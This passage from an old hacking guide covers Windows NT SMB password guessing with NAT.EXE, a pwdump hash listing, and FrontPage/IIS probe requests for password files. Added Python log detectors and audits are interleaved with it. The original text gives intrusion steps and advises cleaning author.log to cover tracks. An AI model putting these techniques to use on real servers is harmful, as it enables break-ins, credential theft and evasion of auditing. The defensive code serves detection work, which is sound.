Hackers Desk Reference

C:\>net use /?
The syntax of this command is:
NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username] [[/DELETE] | [/PERSISTENT:{YES | NO}]]
NET USE [devicename | *] [password | *]] [/HOME]
NET USE [/PERSISTENT:{YES | NO}]
C:\>net use x: \\XXX.XX.XXX.XX\test
The command completed successfully.

C:\unzipped\nat10bin>net use
New connections will be remembered.

Status       Local     Remote                     Network
-------------------------------------------------------------------------------
OK           X:        \\XXX.XX.XXX.XX\test       Microsoft Windows Network
OK                     \\XXX.XX.XXX.XX\test       Microsoft Windows Network
The command completed successfully.
Here is an actual example of how the NAT.EXE program is used. The information listed here is an actual capture of the activity. The IP addresses have been changed to protect, well, us.
C:\>nat -o output.txt -u userlist.txt -p passlist.txt XXX.XX.XX.XX-YYY.YY.YYY.YY
[*]--- Reading usernames from userlist.txt
[*]--- Reading passwords from passlist.txt
[*]--- Checking host: XXX.XX.XXX.XX
[*]--- Obtaining list of remote NetBIOS names
[*]--- Attempting to connect with name: *
[*]--- Unable to connect
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
[*]--- Server time is Mon Dec 01 07:44:34 1997
[*]--- Timezone is UTC-6.0
[*]--- Remote server wants us to encrypt, telling it not to
[*]--- Attempting to connect with name: *SMBSERVER
[*]--- CONNECTED with name: *SMBSERVER
[*]--- Attempting to establish session
[*]--- Was not able to establish session with no password
[*]--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
[*]--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
[*]--- Obtained server information:
Server=[STUDENT1] User=[] Workgroup=[DOMAIN1] Domain=[]
[*]--- Obtained listing of shares:
Sharename      Type      Comment
---------      ----      -------
ADMIN$         Disk:     Remote Admin
C$             Disk:     Default share
IPC$           IPC:      Remote IPC
NETLOGON       Disk:     Logon server share
Test           Disk:
[*]--- This machine has a browse list:
Server         Comment
---------      -------
STUDENT1
[*]--- Attempting to access share: \\*SMBSERVER\
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Able to access share: \\*SMBSERVER\ADMIN$
[*]--- Checking write access in: \\*SMBSERVER\ADMIN$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\ADMIN$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\ADMIN$
[*]--- Attempting to access share: \\*SMBSERVER\C$
[*]--- WARNING: Able to access share: \\*SMBSERVER\C$
[*]--- Checking write access in: \\*SMBSERVER\C$
[*]--- WARNING: Directory is writeable: \\*SMBSERVER\C$
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\C$
[*]--- Attempting to access share: \\*SMBSERVER\NETLOGON
[*]--- WARNING: Able to access share: \\*SMBSERVER\NETLOGON
[*]--- Checking write access in: \\*SMBSERVER\NETLOGON
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\NETLOGON
[*]--- Attempting to access share: \\*SMBSERVER\Test
[*]--- WARNING: Able to access share: \\*SMBSERVER\Test
[*]--- Checking write access in: \\*SMBSERVER\Test
[*]--- Attempting to exercise .. bug on: \\*SMBSERVER\Test
[*]--- Attempting to access share: \\*SMBSERVER\D$
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\ROOT
[*]--- Unable to access
[*]--- Attempting to access share: \\*SMBSERVER\WINNT$
[*]--- Unable to access
If the default share of Everyone/Full Control is active, then you are done; the server is hacked. If not, keep playing. You will be surprised what you find out.
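The capture above leaves a recognisable trace on the target: a null-session attempt, a run of failed logons from one host, then a success with a guessed password. The following is an added example, not part of the Hackers Desk Reference or of NAT.EXE, that looks for that sequence in Windows Security log records. The records are constructed inline (the field names, host names and the threshold of five failures are assumptions of the example); event IDs 4625/4624 are the Vista-and-later failure/success logon events, which NT4 logged as 529/528.

```python
"""Spot NAT-style SMB password guessing in Windows Security log records.

Added example for this section; it is not part of the Hackers Desk Reference
and not part of NAT.EXE. It looks for the sequence the capture above produces
on the target: a null-session attempt, a burst of failed logons from one
source host, then a success with a guessed password.

Assumptions: the records are constructed here as dicts; real logs would be
exported from the Security log. Event IDs 4625/4624 (failure/success) are the
Vista-and-later numbers; NT4 logged the same events as 529/528.
"""
from collections import defaultdict

FAILURE_IDS = {529, 4625}
SUCCESS_IDS = {528, 4624}

# Constructed sample: WKS-ATTACK runs a wordlist against ADMINISTRATOR after a
# null-session try; WKS-MARI is a user who mistypes once and then logs in.
SAMPLE_EVENTS = [
    {"time": "07:44:01", "id": 4625, "user": "", "src": "WKS-ATTACK"},
    {"time": "07:44:02", "id": 4625, "user": "ADMINISTRATOR", "src": "WKS-ATTACK"},
    {"time": "07:44:02", "id": 4625, "user": "ADMINISTRATOR", "src": "WKS-ATTACK"},
    {"time": "07:44:03", "id": 4625, "user": "ADMINISTRATOR", "src": "WKS-ATTACK"},
    {"time": "07:44:03", "id": 4625, "user": "ADMINISTRATOR", "src": "WKS-ATTACK"},
    {"time": "07:44:04", "id": 4625, "user": "ADMINISTRATOR", "src": "WKS-ATTACK"},
    {"time": "07:44:05", "id": 4624, "user": "ADMINISTRATOR", "src": "WKS-ATTACK"},
    {"time": "07:50:00", "id": 4625, "user": "mari", "src": "WKS-MARI"},
    {"time": "07:50:09", "id": 4624, "user": "mari", "src": "WKS-MARI"},
]


def analyse(events, threshold=5):
    """Return findings for source hosts whose failure run reaches `threshold`.

    A run is counted per source host and reset on any success, so the
    failures_before_success figure tells a wordlist run from a typo.
    """
    runs = defaultdict(lambda: {"failures": 0, "anonymous": 0, "users": set()})
    findings = []
    for ev in events:
        state = runs[ev["src"]]
        if ev["id"] in FAILURE_IDS:
            state["failures"] += 1
            if ev["user"] == "":          # empty user: null-session style attempt
                state["anonymous"] += 1
            else:
                state["users"].add(ev["user"])
        elif ev["id"] in SUCCESS_IDS:
            if state["failures"] >= threshold:
                findings.append({
                    "src": ev["src"],
                    "user": ev["user"],
                    "failures_before_success": state["failures"],
                    "anonymous_attempts": state["anonymous"],
                    "users_tried": sorted(state["users"]),
                    "verdict": "guessed-password-success",
                })
            state["failures"] = 0
            state["anonymous"] = 0
            state["users"] = set()
    # Sources still failing at the end of the window: guessing may be ongoing.
    for src, state in runs.items():
        if state["failures"] >= threshold:
            findings.append({
                "src": src,
                "user": None,
                "failures_before_success": state["failures"],
                "anonymous_attempts": state["anonymous"],
                "users_tried": sorted(state["users"]),
                "verdict": "guessing-in-progress",
            })
    return findings


if __name__ == "__main__":
    for finding in analyse(SAMPLE_EVENTS):
        print(finding)
```

The success-after-burst pattern is the one worth alerting on: a single host that fails five times and then authenticates as ADMINISTRATOR is the NAT run above seen from the other side, while the one-off failure from WKS-MARI stays below the threshold. Account lockout (NT4 logged it as event 539) would stop the run before the success line ever appears.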
[9.0.0] Frontpage Extension Attacks
Of course, everyone should know what Microsoft FrontPage is. The server extensions are installed server side to provide added functionality for FrontPage web authors. These extensions function as "web bots", if you will, giving web authors that use FrontPage easy access to complex web and HTML functions. Soon after the extensions came into wide use, security concerns began to pop up. Most of these security concerns were very basic; the collection presented below consists of PROVEN methods that have been tested repeatedly in several types of configurations.
[9.0.1] For the tech geeks, we give you an actual PWDUMP
This is the pwdump from the web server; the LAN Manager password is set to "password". This PWDUMP example is for those of you that have heard about the utility but may never have actually seen the output of one. This dump was used by Vacuum of rhino9 during his journey into cracking the NT encryption algorithm.
Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:Built-in account for administering the computer/domain::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in account for guest access to the computer/domain::
STUDENT7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378EFEE40503127253:::
ketan:1005:********************************:********************************:::
mari:1006:********************************:********************************:::
meng:1007:********************************:********************************:::
IUSR_STUDENT7:1014:582E6943331763A63BEC2B852B24C4D5:CBE9D641E74390AD9C1D0A962CE8C24B:Internet Guest Account,Internet Server Anonymous Access::
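Reading a dump like the one above is itself a useful audit: the presence of an LM hash, an empty second LM half, a NO PASSWORD marker, or two accounts sharing one NT hash each say something about password policy without cracking anything. The following parser and audit is an added example, not part of the Hackers Desk Reference or of the pwdump tool; the first four sample lines are copied from the dump above, the two svc_* accounts are constructed with placeholder hex, and the finding names are the example's own.

```python
"""Audit a pwdump listing for the weaknesses the dump above makes visible.

Added example; it is not from the Hackers Desk Reference or from the pwdump
tool. The format it parses is the one shown above:
user:RID:LM-hash:NT-hash:comment:home-dir:

Checks (all on stored hashes, nothing is cracked):
  - blank-password        the dump says NO PASSWORD for the account
  - lm-hash-stored        a real LM hash is present, so the LAN Manager
                          hash is kept alongside the NT hash
  - password-7-or-fewer   second LM half is the hash of an empty block,
                          i.e. the password is at most 7 characters
  - shared-password       two accounts have the same NT hash
  - hash-not-dumped       the hash fields were masked with asterisks
  - machine-account       name ends in '$' (a computer, not a person)

Assumption: the constant AAD3B435B51404EE is the LM hash half produced by an
empty 7-character block (a well-known value, not taken from this page).
"""
from collections import defaultdict

EMPTY_LM_HALF = "AAD3B435B51404EE"
EMPTY_LM = EMPTY_LM_HALF * 2
NO_PASSWORD = "NO PASSWORD"

# Sample input. The first four lines are copied from the dump above; the two
# svc_* accounts are constructed with placeholder hex to show the remaining
# checks (same hashes on both, second LM half empty).
SAMPLE_PWDUMP = """\
Administrator:500:E52CAC67419A9A224A3B108F3FA6CB6D:8846F7EAEE8FB117AD06BDD830B7586C:Built-in account for administering the computer/domain::
Guest:501:NO PASSWORD*********************:NO PASSWORD*********************:Built-in account for guest access to the computer/domain::
STUDENT7$:1000:E318576ED428A1DEF4B21403EFDE40D0:1394CDD8783E60378EFEE40503127253:::
ketan:1005:********************************:********************************:::
svc_backup:1020:0123456789ABCDEFAAD3B435B51404EE:00112233445566778899AABBCCDDEEFF:constructed sample::
svc_report:1021:0123456789ABCDEFAAD3B435B51404EE:00112233445566778899AABBCCDDEEFF:constructed sample::
"""


def parse_pwdump(text):
    """Split each line on ':' and return a list of account dicts."""
    accounts = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"malformed pwdump line: {line!r}")
        accounts.append({
            "user": parts[0],
            "rid": int(parts[1]),
            "lm": parts[2].upper(),
            "nt": parts[3].upper(),
            "comment": parts[4] if len(parts) > 4 else "",
        })
    return accounts


def _is_hash(field):
    """True for a 32-digit hex string (a real LM or NT hash)."""
    return len(field) == 32 and all(c in "0123456789ABCDEF" for c in field)


def audit(text):
    """Return {username: [finding, ...]} for every account in the dump."""
    accounts = parse_pwdump(text)
    findings = {}
    by_nt = defaultdict(list)
    for acct in accounts:
        issues = []
        lm, nt = acct["lm"], acct["nt"]
        if NO_PASSWORD in lm or NO_PASSWORD in nt:
            issues.append("blank-password")
        elif lm.startswith("*") and nt.startswith("*"):
            issues.append("hash-not-dumped")
        if _is_hash(lm) and lm != EMPTY_LM:
            issues.append("lm-hash-stored")
            if lm.endswith(EMPTY_LM_HALF):
                issues.append("password-7-or-fewer")
        if _is_hash(nt):
            by_nt[nt].append(acct["user"])
        if acct["user"].endswith("$"):
            issues.append("machine-account")
        findings[acct["user"]] = issues
    for users in by_nt.values():
        if len(users) > 1:
            for user in users:
                findings[user].append("shared-password")
    return findings


if __name__ == "__main__":
    for user, issues in audit(SAMPLE_PWDUMP).items():
        print(f"{user:16} {', '.join(issues) or 'ok'}")
```

The lm-hash-stored finding is the one that matters most on an NT system: as long as an LM hash is kept, the password is effectively limited to two independent 7-character halves of upper-cased text, which is what made the crack the author refers to feasible. Disabling LM hash storage, or enforcing passwords longer than 14 characters, removes that field from the dump.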
[9.0.2] The haccess.ctl file
The haccess.ctl file is sometimes called a shadow password file; well, this is not exactly correct. The file can give you a lot of information, including the location of the service password file. A complete example of the haccess.ctl file is given below:
The #haccess.ctl file:
# -FrontPage-
Options None
<Limit GET POST PUT>
order deny,allow
deny from all
</Limit>
AuthName default_realm
AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp
Executing fpservwin.exe allows FrontPage server extensions to be installed on:
port 443 (HTTPS) Secure Sockets Layer
port 80 (HTTP)
NOTE the Limit line: the GET, POST and PUT methods it names can be issued by telnetting to port 80 or 443 directly, instead of through FrontPage.
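The Limit line above is a configuration point a defender should read carefully, since in Apache-style syntax a <Limit> block affects only the methods it lists. The following audit script is an added example, not part of the Hackers Desk Reference nor Microsoft's or Apache's code; it parses the #haccess.ctl shown above and reports which common methods the block leaves unrestricted and whether the AuthUserFile/AuthGroupFile paths lie under the web content root. The content root "c:/frontpage webs/content", the COMMON_METHODS list and the finding names are assumptions of the example.

```python
"""Audit a FrontPage #haccess.ctl access file (Apache-style syntax).

Added example; it is not part of the Hackers Desk Reference and not
Microsoft's or Apache's code. It parses the file shown above and reports:
  - which request methods the <Limit> block actually restricts, and which
    common methods it leaves untouched;
  - whether AuthUserFile / AuthGroupFile point inside the web content tree.

Assumptions: <Limit> is read with Apache semantics, where the directives
inside it apply only to the listed methods (Apache's <LimitExcept> is the
form that covers everything else); the content root is taken from the paths
in the file itself.
"""
import re

# The file exactly as shown above; "\ " escapes the space in the path.
SAMPLE_HACCESS = r"""# -FrontPage-
Options None
<Limit GET POST PUT>
order deny,allow
deny from all
</Limit>
AuthName default_realm
AuthUserFile c:/frontpage\ webs/content/_vti_pvt/service.pwd
AuthGroupFile c:/frontpage\ webs/content/_vti_pvt/service.grp
"""

COMMON_METHODS = ["GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "TRACE"]


def parse_haccess(text):
    """Return {'limits': [{'methods': [...], 'directives': [(k, v), ...]}],
    'directives': {key: value}} (the latter for lines outside any <Limit>)."""
    limits, directives, current = [], {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        opened = re.match(r"<Limit\s+([^>]+)>$", line, re.IGNORECASE)
        if opened:
            if current is not None:
                raise ValueError("nested <Limit> is not allowed")
            current = {"methods": opened.group(1).upper().split(), "directives": []}
            continue
        if line.lower() == "</limit>":
            if current is None:
                raise ValueError("</Limit> without <Limit>")
            limits.append(current)
            current = None
            continue
        key, _, value = line.partition(" ")
        value = value.replace("\\ ", " ").strip()   # unescape "\ " in paths
        if current is not None:
            current["directives"].append((key, value))
        else:
            directives[key] = value
    if current is not None:
        raise ValueError("unterminated <Limit>")
    return {"limits": limits, "directives": directives}


def audit_haccess(text, content_root="c:/frontpage webs/content"):
    """Return a list of (finding, detail) tuples."""
    parsed = parse_haccess(text)
    findings = []
    restricted = set()
    for block in parsed["limits"]:
        denies_all = any(k.lower() == "deny" and v.lower() == "from all"
                         for k, v in block["directives"])
        if denies_all:
            restricted.update(block["methods"])
    left_open = [m for m in COMMON_METHODS if m not in restricted]
    if left_open:
        findings.append(("limit-leaves-methods-open", left_open))
    root = content_root.lower().rstrip("/") + "/"
    for key in ("AuthUserFile", "AuthGroupFile"):
        path = parsed["directives"].get(key, "")
        if path.lower().replace("\\", "/").startswith(root):
            findings.append(("credential-file-under-web-root", f"{key}={path}"))
    return findings


if __name__ == "__main__":
    for finding, detail in audit_haccess(SAMPLE_HACCESS):
        print(f"{finding}: {detail}")
```

Both findings point at the same mitigation: the _vti_pvt credential files should not live where the web server can serve them, and the method restriction should be written so that methods not named in the block are covered as well.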
The following lists the Internet Information Server file locations on the local hard drive (C:) and the corresponding paths on the web (www.target.com):
C:\InetPub\wwwroot                        <Home>
C:\InetPub\scripts                        /Scripts
C:\InetPub\wwwroot\_vti_bin               /_vti_bin
C:\InetPub\wwwroot\_vti_bin\_vti_adm      /_vti_bin/_vti_adm
C:\InetPub\wwwroot\_vti_bin\_vti_aut      /_vti_bin/_vti_aut
C:\InetPub\cgi-bin                        /cgi-bin
C:\InetPub\wwwroot\srchadm                /srchadm
C:\WINNT\System32\inetserv\iisadmin       /iisadmin
C:\InetPub\wwwroot\_vti_pvt
FrontPage creates a directory _vti_pvt for the root web and for each FrontPage sub-web. For each FrontPage web with unique permissions, the _vti_pvt directory contains two files for the FrontPage web that the access file points to:
service.pwd contains the list of users and passwords for the FrontPage web.
service.grp contains the list of groups (one group for authors and one for administrators in FrontPage).
On Netscape servers, there are no service.grp files. The Netscape password files are:
administrators.pwd for administrators
authors.pwd for authors and administrators
users.pwd for users, authors, and administrators
C:\InetPub\wwwroot\samples\Search\QUERYHIT.HTM    Internet Information Server Index Server sample
If Index Server is running under Internet Information Server, service.pwd (or any other file) can sometimes be retrieved: search for "#filename=*.pwd".
C:\Program Files\Microsoft FrontPage\_vti_bin
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_aut
C:\Program Files\Microsoft FrontPage\_vti_bin\_vti_adm
C:\WINNT\System32\inetserv\iisadmin\htmldocs\admin.htm    /iisadmin/isadmin
C:\InetPub\ftproot                        The default location for the ftp
The ftp service by default runs on the standard port 21.
Check to see if anonymous connections are allowed. By default, Internet Information Server creates and uses the account IUSR_computername for all anonymous logons. Note that the password is used only within Windows NT; anonymous users do not log on using this user name and password.
Typically, anonymous FTP users will use "anonymous" as the user name and their e-mail address as the password. The FTP service then uses the IUSR_computername account as the logon account for permissions. When installed, Internet Information Server's Setup created the account IUSR_computername in the Windows NT User Manager for Domains and in Internet Service Manager. This account was assigned a random password in both Internet Service Manager and the Windows NT User Manager for Domains. If you change the password, you must change it in both places and make sure it matches.
NOTE: Name and password are case sensitive.
Scanning PORT 80 (http) or 443 (https) options:
GET /_vti_inf.html                  # Ensures that FrontPage server extensions are installed.
GET /_vti_pvt/service.pwd           # Contains the encrypted password files. Not used on IIS and WebSite servers.
GET /_vti_pvt/authors.pwd           # On Netscape servers only. Encrypted names and passwords of authors.
GET /_vti_pvt/administrators.pwd
GET /_vti_log/author.log            # If author.log is there it will need to be cleaned to cover your tracks.
GET /samples/search/queryhit.htm
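As a defender's counterpart to the scanning list above, the following added example (not from the Hackers Desk Reference) turns those request paths into log signatures and flags a source address that walks through them, noting any credential file that was actually served. The simplified W3C log layout, the PROBE_PATHS table, the sample addresses, the CiRestriction query parameter in the sample line and the two-probe threshold are all constructed for the example.

```python
"""Flag FrontPage reconnaissance in IIS-style web access log lines.

Added example; not part of the Hackers Desk Reference. It takes the probe
list above (plus the Index Server "#filename=*.pwd" query) as signatures
and reports source addresses that request two or more of them, noting any
credential file that was actually served (status 200).

Assumptions: the log lines are constructed here in a simplified W3C layout
"date time c-ip cs-method cs-uri sc-status"; paths are compared after URL
decoding, lower-casing and collapsing repeated slashes, so case tricks and
doubled slashes do not evade the match.
"""
import re
from collections import defaultdict
from urllib.parse import unquote

PROBE_PATHS = {
    "/_vti_inf.html": "extension presence check",
    "/_vti_pvt/service.pwd": "FrontPage password file",
    "/_vti_pvt/authors.pwd": "Netscape authors password file",
    "/_vti_pvt/administrators.pwd": "Netscape administrators password file",
    "/_vti_log/author.log": "authoring log",
    "/samples/search/queryhit.htm": "Index Server sample query page",
}

# Constructed sample log: 10.0.0.7 walks the list, 10.0.0.9 fetches one file,
# 10.0.0.12 is ordinary traffic.
SAMPLE_LOG = """\
1997-12-01 07:44:10 10.0.0.7 GET /index.htm 200
1997-12-01 07:44:11 10.0.0.7 GET /_vti_inf.html 200
1997-12-01 07:44:12 10.0.0.7 GET /_VTI_PVT/service.pwd 200
1997-12-01 07:44:12 10.0.0.7 GET /_vti_pvt/authors.pwd 404
1997-12-01 07:44:13 10.0.0.7 GET //_vti_log/author.log 200
1997-12-01 07:44:13 10.0.0.7 GET /samples/search/queryhit.htm?CiRestriction=%23filename%3D*.pwd 200
1997-12-01 07:45:00 10.0.0.9 GET /_vti_inf.html 200
1997-12-01 07:46:00 10.0.0.12 GET /products.htm 200
"""


def normalise(uri):
    """Split off the query string, URL-decode, lower-case, collapse '//'."""
    path, _, query = uri.partition("?")
    path = re.sub(r"/+", "/", unquote(path)).lower()
    return path, unquote(query)


def parse_line(line):
    """Parse one simplified W3C line into a record dict."""
    date, time, ip, method, uri, status = line.split()
    return {"when": f"{date} {time}", "ip": ip, "method": method.upper(),
            "uri": uri, "status": int(status)}


def detect(log_text, min_probes=2):
    """Return one finding per source that hit at least `min_probes` signatures."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_line(line)
        path, query = normalise(rec["uri"])
        if path in PROBE_PATHS:
            seen[rec["ip"]].append((path, PROBE_PATHS[path], rec["status"]))
        q = query.lower()
        if "filename=" in q and ".pwd" in q:
            seen[rec["ip"]].append((path, "Index Server query for .pwd files", rec["status"]))
    findings = []
    for ip, probes in seen.items():
        if len(probes) < min_probes:
            continue
        served = sorted({p for p, _, s in probes if p.endswith(".pwd") and s == 200})
        findings.append({"ip": ip, "probes": len(probes),
                         "served_credentials": served, "details": probes})
    return findings


if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding["ip"], finding["probes"], finding["served_credentials"])
```

A served_credentials entry is the item to act on first: a 200 on a _vti_pvt password file means the credential file sits in a web-served directory, so the response is to move or deny it and rotate the FrontPage passwords, not merely to block the address. The one-off fetch of _vti_inf.html from 10.0.0.9 stays below the threshold, since the FrontPage client itself requests that file.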
If service.pwd is obtained it will look similar to this: